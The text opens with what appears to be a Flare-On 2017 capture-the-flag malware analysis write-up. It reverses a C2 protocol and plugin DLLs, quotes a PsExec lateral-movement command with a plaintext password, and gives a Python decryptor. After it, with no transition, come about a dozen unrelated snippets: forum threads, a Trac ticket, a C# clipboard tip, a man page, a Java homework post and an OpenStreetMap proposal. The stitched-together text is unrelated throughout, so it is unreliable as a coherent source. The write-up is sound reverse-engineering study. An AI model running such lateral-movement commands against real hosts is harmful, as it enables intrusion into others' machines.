Instead of manually decoding the encoded response from the C2 server, we can be lazy and recover secondstage.exe by breaking at 0x4104C1:
0:000> bp 0x4104C1; g Breakpoint 0 hit [...] 0:000> !dh edx File Type: EXECUTABLE IMAGE FILE HEADER VALUES 14C machine (i386) 5 number of sections 592F22F3 time date stamp Wed May 31 13:09:23 2017 0 file pointer to symbol table 0 number of symbols E0 size of optional header 102 characteristics Executable 32 bit word machine [...] 0:000> .writemem F:\flareon_2017\12\secondstage.exe edx l1d400 Writing 1d400 bytes...........................................................
Initial analysis of secondstage
Thanks to CFF Explorer, one can easily edit the secondstage.exe PE header to deactivate code base randomization by unsetting IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE and rebuilding the header.
secondstage's analysis starts at 0x405220, which initializes a bunch of stuff, including loading all dynamically resolved functions into an array of pointers. This provides a bit of obfuscation against static analysis, since all function calls are then performed through indirect calls. Then, if the executable is run client-side, it initiates the connection to the C2 server:
Every time a packet is received, the function 0x0402C50 is called to parse the new message and send the answer back. The C2 is still behind the FQDN maybe.suspicious.to, which in the PCAP file is associated with the IP address 52.0.104.200.
Reversing the communication protocol
A big part of this challenge consisted in understanding the protocol, because once it was entirely assimilated, every piece of code fell into place.
An initial glimpse into the second TCP stream of the PCAP already reveals a lot of valuable information about the protocol:
- it is a non-standard (i.e. custom) binary protocol
- it is (for most part) non encrypted
- some parts of the header can be instantly recognized (magic=’2017’, the size of the header, size of the data, etc.)
- it transmits some PE code (presence of strings like “text”, “rdata”, “reloc”, “kernel32.dll”, names of methods, etc.)
The function 0x403210 reveals a great deal about the protocol: when a new packet is received, the function ensures that its length is at least 0x24 bytes, and that the first 4 bytes are equal to "2017". This is the layout of the first 0x24 bytes of the header:
0000 "2017" 0004 DataCheckSum 0008 HeaderSize 000c DataSize 0010 DataSize2 // this field is explained later on 0014 Magic_of_Module
What the hell are those modules? What is their magic number?
To understand that, I wrote a "replayer" that would spoof the C2 IP address and replay all the packets to the running instance of secondstage. After a few packets, the !address command showed that new memory areas had been allocated in the address space, all with PAGE_EXECUTE_READWRITE permission, and all starting with LM.... Searching for the constant 0x4d4c ('LM' in little endian), IDA spotted the instruction 004053CE cmp edx, 4D4Ch, which happens to be followed by a call to Kernel32!VirtualAlloc() with PAGE_EXECUTE_READWRITE (0x40) set as the protection, then a LoadLibraryA. This must be it, so we can now use WinDBG to dump all those modules:
0:000> bp 004053ce ; g 0:000> dd ecx+poi(ecx+3c)+50 l1 0018d2b8 00017000 0:000> .writemem E:\secondstage-lm-<id>.dll ecx lpoi(ecx+poi(ecx+3c)+50) Writing 17000 bytes..............................................
8 modules were found. Each of them can be converted back to a valid PE format by replacing "LM\x00\x00" with "MZ\x00\x00", and "NOP\x00" with "PE\x00\x00". Finally, the entry point must be xored with the value 0xABCDABCD.
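Those three fixes are mechanical, so here is a small sketch automating them (AddressOfEntryPoint sits at e_lfanew+0x28 in a PE32 optional header):

import struct

def lm_to_pe(path_in, path_out):
    buf = bytearray(open(path_in, "rb").read())
    buf[0:2] = b"MZ"                                   # "LM" -> "MZ"
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    buf[e_lfanew:e_lfanew + 4] = b"PE\x00\x00"         # "NOP\x00" -> "PE\x00\x00"
    ep_off = e_lfanew + 0x28                           # OptionalHeader.AddressOfEntryPoint
    ep = struct.unpack_from("<I", buf, ep_off)[0] ^ 0xABCDABCD
    struct.pack_into("<I", buf, ep_off, ep)
    open(path_out, "wb").write(buf)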
Reversing the “Loadable Modules”
All those modifications give us 8 DLLs that are sent by the C2 and loaded in secondstage, with the following names in them:
- r.dll
- t.dll
- 6.dll
- x.dll
- z.dll
- f.dll
- s.dll
- m.dll
Using Diaphora to bin-diff those DLLs showed that they are 99% similar, except for a handful of functions. So naturally I focused on reversing only those functions.
In all DLLs (and even in secondstage), one function could always be found doing something like:
if (memcmp(pkt->Magic_of_Module, magic_array_of_0x10_bytes, 0x10) == 0){
    data = malloc( pkt->DataSize2 );
    /* process(pkt) */
}
This appears to be the function called when a received packet's "magic" field matches the DLL. Symmetrically, another function could be found that builds the response packet for this module. Reversing all those modules can be summarized as follows:
3 types of plugin actions can be found (as detailed by 0x04025DF):
- CMD: send and receive commands to/from the client (get OS information, execute a command in a terminal, etc.)
- CRPT: cryptographic operations
- COMP: compression operations
And here is where the header field DataSize2 (at header+0x10) comes in handy: actions triggered by crypto or compression modules can produce an output whose length differs from the original header.DataSize. The field DataSize2 indicates the size of the output after the cryptographic or compression operation has been done. Although several crypto operations were used, the key (and IV when needed) could always be found in the message header.
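In a parser, this maps naturally to a registry keyed by the 16-byte module magic; a sketch (handler names are mine, and only the p.dll magic below is taken from the capture):

HANDLERS = {}    # module magic (hex string) -> decode/handle function

def register(magic):
    def deco(fn):
        HANDLERS[magic.lower()] = fn
        return fn
    return deco

@register("77d6ce92347337aeb14510807ee9d7be")   # p.dll, the proxy module
def handle_proxy(hdr, payload):
    return payload                               # pass-through

def dispatch(hdr, payload):
    return HANDLERS[hdr["module_magic"]](hdr, payload)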
Chaining modules together allows the creation of some pretty complex output (for example Base64( zlib_deflate( XTEA(data) ) )) that would be absolutely impossible to decode correctly with static analysis of the PCAP file alone. So if we want to reconstruct the data, we must at some point write a parser for the data in the PCAP (the final version of the parser can be found here).
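Once each module is reimplemented, undoing a chain is just function composition applied in reverse order; a sketch (xtea_decrypt stands for the custom XTEA reversed from its module, and zlib's wbits may need adjusting if the stream is raw deflate):

import base64, zlib

def decode_chain(data, key):
    """Undo Base64( zlib_deflate( XTEA(data) ) )."""
    step1 = base64.b64decode(data)
    step2 = zlib.decompress(step1)
    return xtea_decrypt(step2, key)   # key (and IV) come from the message header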
Reconstructing the screen capture
m.dll captures the desktop as a bitmap and sends the raw data back to the C2 (it uses the same function as the MSDN example). But because it is a pure bitmap, there is no information about the dimensions of the image. In addition, the image is split into several packets, some of which are sent in plaintext, like this:
00010A26 32 30 31 37 49 d8 69 59 24 00 00 00 4c 40 00 00 2017I.iY $...L@.. 00010A36 4c 40 00 00 51 29 8f 74 16 67 d7 ed 29 41 95 01 L@..Q).t .g..)A.. 00010A46 06 f5 05 45 1c 00 00 00 30 40 00 00 30 40 00 00 ...E.... 0@..0@.. 00010A56 f3 71 26 ad 88 a5 61 7e af 06 00 0d 42 4c 5a 21 .q&...a~ ....BLZ! 00010A66 17 04 17 20 03 00 00 00 51 00 00 00 00 00 00 00 ... .... Q....... 00010A76 00 00 00 00 a3 ae cc a1 cb 4f aa 7a 9a 59 4d 13 ........ .O.z.YM. 00010A86 8a 1b fb d5 00 00 01 00 38 d1 0f 00 00 40 00 00 ........ 8....@.. 00010A96 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 ........ ........ 00010AA6 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 ........ ........ 00010AB6 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 ........ ........ [...]
Others are compressed and/or encrypted by the different algorithms mentioned above; however, they are all sent sequentially. Once all the fragments were extracted by the parser, they were merged into a raw file. Thanks to a good tip by alex_k_polyakov, I used the website RawPixels.net, and when setting a resolution of 1420x720, the following capture showed up:
After all those efforts, finally a good lead on the challenge to find.
More Loadable Modules !!
Continuing the replay of packets showed something very interesting: secondstage.exe was sending commands to a child cmd.exe process, attempting to reach a host whose NetBIOS name is larryjohnson-pc; if found, it would drop 2 files in C:\staging, pse.exe and srv2.exe. Finally it would execute the command:
pse.exe \\larryjohnson-pc -i -c -f -d -u larry.johnson -p n3v3rgunnag1veUup -accepteula srv2.exe
pse.exe is nothing more than SysInternals PsExec, so the command pushes and executes srv2.exe as the user larry.johnson. If all went well, secondstage.exe then attempts to load a new Loadable Module, p.dll, whose magic is 77D6CE92347337AEB14510807EE9D7BE. This DLL is used to proxy the packets from/to the C2 directly to srv2.exe via secondstage.exe. In addition, the C2 then sends a few new Loadable Modules to the running srv2.exe process:
Smart parsing of the PCAP
Altogether, 15 Loadable Modules had to be reimplemented for decompression or decryption. In some cases, the implementation of the algorithm was not standard (for example RC4), so I had to rewrite it from scratch based solely on the reversed DLL. The ApLib module in particular was a pain to get right.
But it was critical that our implementation strictly stick to the one from the module, so a lot (a LOOOOOT) of testing was required, as even a one-byte mistake could make the content of a packet unreadable for the upper layer, making it impossible to decrypt files later on…
After some long hours perfecting the decrypting script, the effort paid off directly: all traffic is now in plaintext, revealing some crispy information:
2 new files can be found in the extract:
- cf.exe, a C#-compiled file
- a 561972-byte file beginning with the pattern cryp
cf.exe doesn’t show much mystery: it takes 2 parameters, a path to file, and a
base64 encoded key. And it will AES encrypt the file with the given key.
As seen in the capture above, we were able to decrypt the packet that holds the command used for encrypting the file.
c:\staging\cf.exe lab10.zip tCqlc2+fFiLcuq1ee1eAPOMjxcdijh8z0jrakMA/jxg=
So we can build a decryptor in a few lines of Python:
import base64, sys, hashlib, struct from Crypto import Random from Crypto.Cipher import AES BLOCK_SIZE = 32 def p32(x): return struct.pack("<I",x) def u32(x): return struct.unpack("<I",x)[0] def decrypt(encrypted, passphrase, iv): aes = AES.new(passphrase, AES.MODE_CBC, iv) return aes.decrypt(encrypted) if __name__ == "__main__": data = open(sys.argv[1]).read() print("[+] data_size = 0x%x" % len(data)) key = base64.b64decode("tCqlc2+fFiLcuq1ee1eAPOMjxcdijh8z0jrakMA/jxg=") i = data.find("cryp") i += 4 iv = data[i:i+0x10] print("[+] iv: %s" % iv.encode('hex')) i += 0x10 sha = data[i:i+0x20] print("[+] sha: %s" % sha.encode('hex')) i += 0x20 enc = data[i:] dec = decrypt(enc, key, iv) sz = u32(dec[:4]) filename = dec[4:4+sz] filesize = u32(dec[4+sz:4+sz+4]) print("[+] filepath '%s'" % filename) print("[+] filesize 0x%x" % filesize) i = 4+sz+8 decrypted_file_content = dec[i:i+filesize] print("[+] len(decrypted) 0x%x, writing 'lab10.zip'..." % len(decrypted_file_content)) open("lab10.zip", "wb").write(decrypted_file_content)
$ python uf.py crypfile [+] data_size = 0x89334 [+] iv: fec85f816b82806996fc991b5731d2e1 [+] sha: 797c33964e0ed15a727d4175c2bff5a637da6587229cce9bd12d6a13cf8596db [+] filepath 'c:\work\flareon2017\package\lab10.zip' [+] filesize 0x892c6 [+] len(decrypted) 0x892c6, , writing 'lab10.zip'...
We’ve got the real challenge!
And to conclude, unzip lab10.zip with the password from the screenshot: infectedinfectedinfectedinfectedinfected919. This drops a file in GoChallenge/build/challenge10, which is a Go challenge in ELF format. But when we execute it, we see a well-deserved reward:
root@kali2:/ctf/flareon_2017/12 # ./GoChallenge/build/challenge10 hello world The answer is: 'n3v3r_gunna_l3t_you_down_1987_4_ever@flare-on.com'
Conclusion
Thank you to FireEye for those fun challenges… and congratulations to all the winners (especially those who managed to finish in under a week, massive props)!! I hope these writeups don't make the challenges look trivial; they weren't (only ~130 out of more than a thousand participants completed all 12 challenges). IMHO, some challenges (like the end of challenges 4 and 10) involved too much guessing, which can be very (VERY) frustrating.
But all in all, it was a fun experience… And thank you to whoever prepared challenge 12: it was huge in all possible meanings, and it must certainly have required serious patience to build!
And final thanks to alex_k_polyakov , n4x0r31 and aymansagy .
See you next year for Flare-On 5!
On Tue, 8 Jan 2008 06:36:41 -0800 (PST), Vincent M wrote:
> Hi,
>
> ?
I have a humor/FYI email list where I send jpg, gif, etc. things I find on the net. If I see something, I'll click up a terminal and use import:
Example:
import ehumor/jpg/cat.jpg
Then press the button, drag the mouse, release the button, and the selection will be stored in $HOME/ehumor/jpg/cat.jpg.
If I change cat.jpg to cat.gif, the format will be .gif.
This will not work for pdfs.
A cron job pulls all files and emails them to everyone on the list.
Opened 3 years ago
Closed 2 years ago
Last modified 2 years ago
#10427 closed enhancement (fixed)
trac.log: dead code - logger_factory()
Description
This code is not referenced from anywhere. It is dead and can be removed - source:/branches/0.12-stable/trac/log.py@10847:67-70#L64
Change History (12)
comment:1 follow-up: ↓ 3 Changed 3 years ago by
comment:2 Changed 3 years ago by
- Milestone changed from 0.12.3 to 0.13
- Type changed from defect to enhancement
(And enhancements go to 0.13.)
comment:3 in reply to: ↑ 1 ; follow-up: ↓ 4 Changed 3 years ago by
comment:4 in reply to: ↑ 3 Changed 3 years ago by
comment:5 Changed 3 years ago by
BTW, I'm not making that number up…
$> svn ls | wc -l 782
And I know plenty of other plugins (including some of mine) that are not published on Trac-Hacks.
Anyway, it was all just meant as a pointer to the fact that there is a lot of legacy code out there that depends on Trac internals… The dead code is likely a left-over of some deprecated call behaviour, and I cannot see that any of those plugins would still be working with recent Trac versions anyway - not with the current eagerness to break APIs and move things around to suit Trac internals… ;-)
comment:6 Changed 3 years ago by
I wonder if we couldn't add a
trac/compat.py module where we could easily move all the old code… something like:
from trac import log def logger_factory(logtype='syslog', logfile=None, level='WARNING', logid='Trac', format=None): return log.logger_handler_factory(logtype, logfile, level, logid, format)[0] log.logger_factory = logger_factory
That way, people could get a cheap way to keep their plugin working, and it would also serve as a way to document what has changed for those who want to adapt their code. That would help to keep the rest of the codebase clean, yet give a safety net for plugins. Of course, this will only work to compensate for removed functions or methods, not for signature changes, but that would still be something.
comment:7 Changed 3 years ago by
- Cc osimons added
We already have
trac.util.compat, but in this case it makes more sense just to remove the code. There is no actual behavior change or code removal, it is just another way calling the same code. If you need to update to import from other module, it should not require much more effort just to change your call syntax instead.
+1 for removing in trunk, no compat.
comment:8 Changed 2 years ago by
- Owner set to rblank
comment:9 Changed 2 years ago by
- Resolution set to fixed
- Status changed from new to closed
comment:10 Changed 2 years ago by
- Owner changed from rblank to anatoly techtonik <techtonik@…>
comment:11 Changed 2 years ago by
- Cc ryano@… added
Right about now Simon should jump out of nowhere and claim that ~800 plugins rely on that function ;)
C# Tip: Monitoring Clipboard Activity in C#
Welcome to this week's installment of .NET Tips & Techniques! Each week, award-winning Architect and Lead Programmer Tom Archer demonstrates how to perform a practical .NET programming task using either C# or Managed C++ Extensions.
My MFC book Visual C++ .NET Bible includes a chapter on working with the Windows Clipboard from Visual C++. Quite a number of readers have asked about how to perform similar tasks in C#. One of those tasks—which the "Clipboard ring" in Microsoft Office has made popular—is specifying that your application is notified if the Clipboard changes. This week's installment of .NET Tips & Techniques provides both an overview and a step-by-step example for accomplishing this with .NET and C#. That way, if you're already familiar with how the Clipboard works (or you're in a hurry) and just want to jump directly to the code, you can.
Figure 1: Example of Monitoring the Windows Clipboard for Any RTF or ASCII Text
Overview
Windows maintains a list, or chain, of windows that have requested to be notified when data on the Clipboard has been modified. Each time the Clipboard data is modified, the first window in this chain receives a message—WM_DRAWCLIPBOARD. The window then can query the Clipboard as to the type of data it contains (such as RTF, ASCII text, and so on) and the actual data. Because there is no managed (.NET) API for adding a window to this notification chain, you have to use the Win32 SetClipboardViewer function. While this is a fairly simple process, you should be aware of some general guidelines when using this function:
- When calling the SetClipboardViewer function, you need to pass the handle of the window that will receive the WM_DRAWCLIPBOARD message. The SetClipboardViewer function returns the current first window in the chain. Your application should store this value—typically in a class member—because each window that receives the WM_DRAWCLIPBOARD message has to send that same message to the next window in the chain (via the SendMessage function).
- Handle the WM_DRAWCLIPBOARD message. This can be done by providing a Form class overload of the WndProc method. You'll see an example of doing this shortly.
- Handle WM_CHANGECBCHAIN message. Because each window that handles the WM_DRAWCLIPBOARD message is responsible for sending that message to the next window in the chain, it must also know when the chain changes. The Clipboard sends the WM_CHANGECBCHAIN message when a window has removed itself from the chain.
- Remove the window from the chain when finished. This task is accomplished via the Win32 ChangeClipboardChain function, and it can be done any time that Clipboard monitoring is no longer needed.
Step-by-step Instructions
- As mentioned in the Overview, you'll need to call several Win32 functions—SetClipboardViewer, ChangeClipboardChain, and SendMessage—in your application. In order to do that from a .NET application, you first have to import those functions by using the DllImport attribute (which resides in the System.Runtime.InteropServices namespace). The following example imports these functions within the demo application's Form class:

using System.Runtime.InteropServices;
...
public class Form1 : System.Windows.Forms.Form
{
    [DllImport("User32.dll")]
    protected static extern int SetClipboardViewer(int hWndNewViewer);

    [DllImport("User32.dll", CharSet=CharSet.Auto)]
    public static extern bool ChangeClipboardChain(IntPtr hWndRemove, IntPtr hWndNewNext);

    [DllImport("user32.dll", CharSet=CharSet.Auto)]
    public static extern int SendMessage(IntPtr hwnd, int wMsg, IntPtr wParam, IntPtr lParam);
    ...

- Define a class member to hold the current first window in the Clipboard notification chain:

public class Form1 : System.Windows.Forms.Form
{
    ...
    IntPtr nextClipboardViewer;

- Call the SetClipboardViewer function. In the demo, I call this function in the form's constructor:

public Form1()
{
    InitializeComponent();
    nextClipboardViewer = (IntPtr)SetClipboardViewer((int)this.Handle);
    ...

- Within the Form class, override the WndProc method. As you can see here, I handle only two messages: WM_DRAWCLIPBOARD and WM_CHANGECBCHAIN. Note that I define two constants for these messages (where both values can be found in the Platform SDK's winuser.h file.)

In the WM_DRAWCLIPBOARD message-handling code, I call a helper function to display the text that is currently on the Clipboard and pass the same message on to the next window in the chain. (You can see the code to display RTF and ASCII text in the article's demo code at the end of this column.)

In the WM_CHANGECBCHAIN message-handling code, I check to see whether the window being removed from the Clipboard chain (passed in the Message.WParam member) is the next window in the chain. If it is, I then set the form's next window member variable (nextClipboardViewer) to the next window in the chain (passed in the Message.LParam member):

protected override void WndProc(ref System.Windows.Forms.Message m)
{
    // defined in winuser.h
    const int WM_DRAWCLIPBOARD = 0x308;
    const int WM_CHANGECBCHAIN = 0x030D;

    switch (m.Msg)
    {
        case WM_DRAWCLIPBOARD:
            DisplayClipboardData();
            SendMessage(nextClipboardViewer, m.Msg, m.WParam, m.LParam);
            break;

        case WM_CHANGECBCHAIN:
            if (m.WParam == nextClipboardViewer)
                nextClipboardViewer = m.LParam;
            else
                SendMessage(nextClipboardViewer, m.Msg, m.WParam, m.LParam);
            break;

        default:
            base.WndProc(ref m);
            break;
    }
}

- Finally, I remove the window from the Clipboard chain when the window class's Dispose method is called by the .NET runtime:

protected override void Dispose(bool disposing)
{
    ChangeClipboardChain(this.Handle, nextClipboardViewer);
    ...
A Chain Is Only As Strong...
After following these few steps, your application will be notified of any changes to the text on the Clipboard. Like a lot of tasks in Windows development, it's not very difficult once you know the right APIs to call. The key issue with working with the Clipboard is to make sure that you follow a few simple rules so that other applications in the Clipboard chain continue to perform correctly.
NAME
sd_bus_message_append_strv - Attach an array of strings to a message
SYNOPSIS
#include <systemd/sd-bus.h>
int sd_bus_message_append_strv(sd_bus_message *m, char **l);
DESCRIPTION
The sd_bus_message_append_strv() function can be used to append an array of strings to message m. The parameter l shall point to a NULL-terminated array of pointers to NUL-terminated strings. Each string must satisfy the same constraints as described for the "s" type in sd_bus_message_append_basic(3).
The memory pointed at by l and the contents of the strings themselves are copied into the memory area containing the message and may be changed after this call. Note that the signature of the l parameter is to be treated as const char *const *, and the contents will not be modified.
RETURN VALUE
On success, this call returns 0 or a positive integer. On failure, it returns a negative errno-style error code.

These APIs are implemented as a shared library, which can be compiled and linked to with the libsystemd pkg-config(1) file.
SEE ALSO
systemd(1), sd-bus(3), sd_bus_message_append(3), sd_bus_message_append_array(3), The D-Bus specification[1]
NOTES
- 1.
- The D-Bus specification
Simple project new Widget-Setting layout via code
Hi all,
I'm wondering how to set a QVBoxLayout on a pre-generated widget:
// header #ifndef FINANZE_H #define FINANZE_H #include <QWidget> #include <QtWidgets> namespace Ui { class Finanze; } class Finanze : public QWidget { Q_OBJECT public: explicit Finanze(QWidget *parent = 0); ~Finanze(); private: Ui::Finanze *ui; }; #endif // FINANZE_H
// cpp
#include "finanze.h"
#include "ui_finanze.h"

Finanze::Finanze(QWidget *parent) :
    QWidget(parent),
    ui(new Ui::Finanze)
{
    ui->setupUi(this);
    QPushButton *btn1 = new QPushButton;
    QVBoxLayout *layout = new QVBoxLayout;
    layout->addWidget(btn1);
    Finanze.setLayout(layout); // Why i can't do something like that?
}

Finanze::~Finanze()
{
    delete ui;
}
Finanze.setLayout(layout); // Why i can't do something like that?
You can, unless there already is a layout set, which is highly likely if you have a .ui file. The layout was probably set in the designer, and the setupUi(this) is applying what you set there. You can't have two layouts set on the same widget.
If you want to create the UI manually from code (as you seem to) then you don't need the .ui file and all the related code.
The finanze.ui doesn't have any layout at project start; it gives me an error when I try to do Finanze.setLayout(layout):
error: expected unqualified-id before '.' token
Finanze.setLayout(layout);
^
Isn't finanze a widget?
Ah, sorry, got off track.
Finanze is a class name. You can't call a method on a class name in c++.
Either just call setLayout(layout) (which will implicitly resolve the call for the current instance), or, if you want to be very explicit, call this->setLayout(layout), although there's little value in that.
Btw. If there's no layout set in that .ui file then why do you need it at all?
So if I write something in the cpp of a class, I declare the STANDARD things that class contains? Every time I create a new "class Finanze", if I set a layout with a button, it will show me the same layout.
But I can still operate on this created class in main, right? For example, I create an instance of the Finanze class called "Hello": if I want to set a new layout on "Hello" or add a new button, can I do that? Even if the Finanze class already has a layout?
Like you saw, I'm just coding to learn, but almost every 2 lines of code I have to stop because I can't find what I'm doing wrong or what I have to do!
So basically I roam the web searching for a solution; if I can't find one, then I try to post it here :D
I have the ui file just because I created it by accident, I just did something wrong following a tutorial...
I saw that you're very present on this board, so I'll try to get the best from you :D. I had another problem yesterday, following a tutorial to create a notepad:
#ifndef NOTEPAD_H #define NOTEPAD_H #include <QApplication> #include <QtWidgets> #include <QWidget> class Notepad : public QWidget { Q_OBJECT public: explicit Notepad(QWidget *parent = 0); ~Notepad(); private slots: void quit(); private: QTextEdit *textEdit; QPushButton *btnQuit; }; #endif // NOTEPAD_H
and this is the cpp
#include "notepad.h" Notepad::Notepad(QWidget *parent) : QWidget(parent) { textEdit = new QTextEdit; btnQuit = new QPushButton(tr("esci")); connect(btnQuit,SIGNAL(clicked(bool)),this,SLOT(quit())); QVBoxLayout *layout = new QVBoxLayout; layout->addWidget(textEdit); layout->addWidget(btnQuit); setLayout(layout); setWindowTitle(tr("Notepad")); } Notepad::~Notepad() { }
But when I try to build it, it says that there is an undefined reference to `Notepad::quit()'. Why?
So if i write in the cpp of a class, i declare the STANDARD thing that class contain? Everytime i create a new "class finance"
You don't declare any standard things. You should familiarize yourself with the following c++ concepts: class, class declaration, class definition and class instance. These are different concepts and you seem to struggle with figuring out what is what.
In short - in a header you declare a class (i.e. describe what it can do). In .cpp you define that class (i.e. describe how it does that by giving a body to the methods and variables declared in the header). In other files (for example in main.cpp) you instantiate a class, i.e. create an object that is described by the declaration in the header and behaves as defined in the cpp. The constructor (
Finanze::Finanze(QWidget *parent)) of a class describes what happens when you create an instance of it. Inside methods of an object (constructor is a method too) you refer to the instance of it (
this) and not to the name of the class. So you don't set a layout on a class (
Finanze.setLayout). You set it on an instance of a class (
this->setLayout).
For example
//Finanze.h
class Finanze : public QWidget
{
public:
    Finanze(QWidget* parent = 0);
};

//Finanze.cpp
Finanze::Finanze(QWidget* parent) : QWidget(parent)
{
    setLayout(new QVBoxLayout());
}

//main.cpp
Finanze foo; //this is one instance of class Finanze, a constructor is called for it here
Finanze bar; //this is another instance of class Finanze, a constructor is called for it here

foo.setLayout(new QHBoxLayout()); // ERROR: foo already has a layout set in the constructor
foo.layout()->addWidget(new QPushButton("Hi")); //but you can add something to it if you want to
delete foo.layout(); //...or delete the layout. Note that it does not delete any widgets added to that layout previously
Btw. Please start new topics for new questions. It's easier for others to jump in or find it later if it's a short thread to the point, rather than finding something useful on page 13 of a lengthy conversation on various topics ;) As for your question: you don't define that slot quit() anywhere. You should have it in your cpp file, like so:
void Notepad::quit() { /* do something */ }
Yes, you're so right; the class concept destroyed all that I learned in VB, Pascal and C... that's why I'm in trouble doing this.
Anyway, you made my day!
Thanks, I will open a new topic for another question :D
Mac.
For some reason the XRootD build (and I think the ROOT build is the same) doesn't find the developer headers/libraries to build SSL dependent code. With this XRootD still builds fine, but when I configure ROOT's build with:
cmake -Dall=ON -Dxrootd=ON -DXROOTD_ROOT_DIR=/usr/local/xrootd/4.2.3 -DCMAKE_INSTALL_PREFIX=/usr/local/root/v6-02-12 ../root
,
Hi Attila. I have no problem with the master on MacOSX 10.11. So, I have now to find the commit that fixes it that was not put in 6.02.
Committed a bunch of changes to fix this problem, the python RPATH treatment and CMake > 3.1 to the 6.02 patch branch.
I am assuming it is solved. Please re-open if it is not the case.
Hi Pere,
While v6-02-00-patches may be fixed for this (I didn't try; at the moment I only have a quite slow laptop running El Capitan, so I'm not compiling the head of the branch on it...), I just tried compiling v6-04-04, and it still has this issue.
I have a vanilla El Capitan installation. On which I build XRootD-4.2.3 simply with:
cmake -DCMAKE_INSTALL_PREFIX=/usr/local/xrootd/4.2.3 ../xrootd-4.2.3
Then, I try to build ROOT-v6-04-04 with:
cmake -Dall=ON -Dxrootd=ON -DXROOTD_ROOT_DIR=/usr/local/xrootd/4.2.3 -DCMAKE_BUILD_TYPE=Release -DCMAKE_INSTALL_PREFIX=/usr/local/root/v6-04-04 ../root-v6-04-04/
And it fails in the way that I described before. Could you have a look? It's very annoying that I can't build ROOT with XRootD support on El Capitan at the moment.
Best,
Attila
While it doesn't add much, these are the failure messages:
[ 54%] Building CXX object net/netx/CMakeFiles/Netx.dir/src/TXNetFile.cxx.o
Scanning dependencies of target RLDAP
[ 54%] Building CXX object net/ldap/CMakeFiles/RLDAP.dir/G__LDAP.cxx.o
/Users/krasznaa/Development/ROOT/root-v6-04-04/net/netx/src/TXNetFile.cxx:64:10: fatal error:
'XpdSysPthread.h' file not found
#include "XpdSysPthread.h"
^
1 error generated.
make[2]: *** [net/netx/CMakeFiles/Netx.dir/src/TXNetFile.cxx.o] Error 1
make[1]: *** [net/netx/CMakeFiles/Netx.dir/all] Error 2
make[1]: *** Waiting for unfinished jobs....
Cheers,
Attila
Now that I'm running 10.11 on a faster machine as well, it turns out that the exact same failure happens with v6-04-04 when I try to build it with:
cmake -Dall=ON -Drpath=ON -Dunuran=OFF -Dbuiltin_xrootd=ON -DCMAKE_INSTALL_PREFIX=/usr/local/root/v6-04-04 ../root
Once again, it fails with:
/Users/krasznaa/Development/ROOT/root/net/netx/src/TXNetFile.cxx:64:10: fatal error:
Best,
Attila
ARGH! One commit available in 6.02 and master was forgotten in 6.04? And the other one was done after the tagging of 6.04. If you could validate the attached patch, I could re-do a patch release of 6.04.
Will do once I get home. (It's my "home Mac" that runs El Capitan already, which is a bit faster.)
Cheers,
Attila
I can confirm that this patch on top of v6-04-04 makes the build succeed in my setup.
Cheers,
Attila
02-21-2012 11:29 AM
Hi all,
I'm having trouble including the NationalInstruments namespace in my application (MS Visual Studio 2010, C#).
I have added the references NationalInstruments.Common and NationalInstruments.VisaNS like in the example files.
However, I get an error message during built saying:
error CS0246: The type or namespace name 'NationalInstruments' could not be found (are you missing a using directive or an assembly reference?)
What am I missing here?
Thanks,
Benjamin
Solved! Go to Solution.
02-24-2012 11:19 AM
This is a double post. Let's keep the discussion on the other thread because this is a C# .NET issue and not related to MStudio for VC++. I have posted a response to the other thread.
06-11-2012 01:30 PM
Problem was solved in the other thread.
Virtual Worksheets
A common step in working with spreadsheet data is creating intermediate tables. In a program we might use an array (which of course you still can in Resolver One), but in a spreadsheet the basic way of storing data is with cell ranges and worksheets. A cell range is just a view onto an area of a worksheet, and the disadvantage of worksheets is that they are always visible. The advantage of using spreadsheet objects rather than arrays is that you get all the methods and properties normally available on spreadsheet objects.
One way round this problem is to directly create a worksheet without adding it to the workbook. This is a normal worksheet, but is not displayed in the grid.
from random import randint

virtual = Worksheet('Virtual')
virtual_range = CellRange(virtual.Cells.A1, virtual.Cells.A1.Offset(9, 9))

for col in range(1, 11):
    for row in range(1, 11):
        virtual_range[col, row] = randint(1, 10)

CopyRange(virtual_range, workbook['Sheet1'].Cells.A1)
This example creates a worksheet with a cell range (virtual_range) covering a ten-by-ten block on the worksheet. The range is populated with data, and then copied back into a visible worksheet using the CopyRange function.
At 05:23 PM 4/21/2005, Branko Čibej wrote:
>This, I think, is a classic case of programmers' hubris. We should've defined apr_pid_t
>&co. on all platforms, not polluted the namespace with names that APR doesn't own (and
>that will clash with any Windows implementation of a POSIX-like API).
++1.
My last point about the patch to apr.hw to define FD_SETSIZE suffers this exact same hubris.
The quicker we (open source projects, collectively) stop trying
to enforce the 'one right way' to use posix/win32 etc, the sooner
these projects will compile (collectively) with one another.
Write a Java program to do the following:
Write a METHOD to input an array of type LONG that stores the value of all the powers of 2 from 0 to 63 (i.e. 2^0 to 2^63).
Output the contents of the array to the screen (what happens if you try 2^64?)
Hint: Math.pow(x,y) raises the number x to the exponent y.
The program just outputs 1.0 many times, which isn't right. Can anyone help?
public class W3P3 {
    public static void main(String[] args) {
        double[] myArray = new double[63];
        long myEntry = 0;
        long Myarray = 0;
        power(myEntry, Myarray);
    } // end of main

    // Method
    public static void power(long x, long y) {
        double results = 0;
        for (int i = 2; i <= 63; i++) {
            results = Math.pow(x, y);
            System.out.println("The result of powers is " + results);
        }
    } // end of method
} // end of class
Proposed features/service:bicycle
Proposal
I propose to introduce
Rationale
Currently bike shops are mapped as shop=bicycle, which means "A store where you can buy and/or repair your bike and buy accessories". This does not convey enough information from a cyclist's perspective.
I propose to introduce the namespace service:bicycle together with the following keys. Should a new key be needed, it should be added to the table with a clear and concise description. Ideally, all keys should support only yes/no values.
If a bicycle shop is not tagged with a key from the above list, it means that its status is unknown: for instance, if a bicycle shop does not have a service:bicycle:repair tag, nothing can be assumed about its repair service.
Applies to
These keys naturally apply to bicycle shops (which are mapped as shop=bicycle) but can apply to other objects as well:
- A hotel could rent bikes
- A supermarket could sell bikes
- A guest house could offer tools for diy
- etc.
Examples
A bicycle shop which sells bikes but doesn't repair them:
shop=bicycle service:bicycle:retail=yes service:bicycle:repair=no
A bicycle shop which doesn't sell bikes, but repairs them and offers a free pump:
shop=bicycle service:bicycle:retail=no service:bicycle:repair=yes service:bicycle:pump=yes
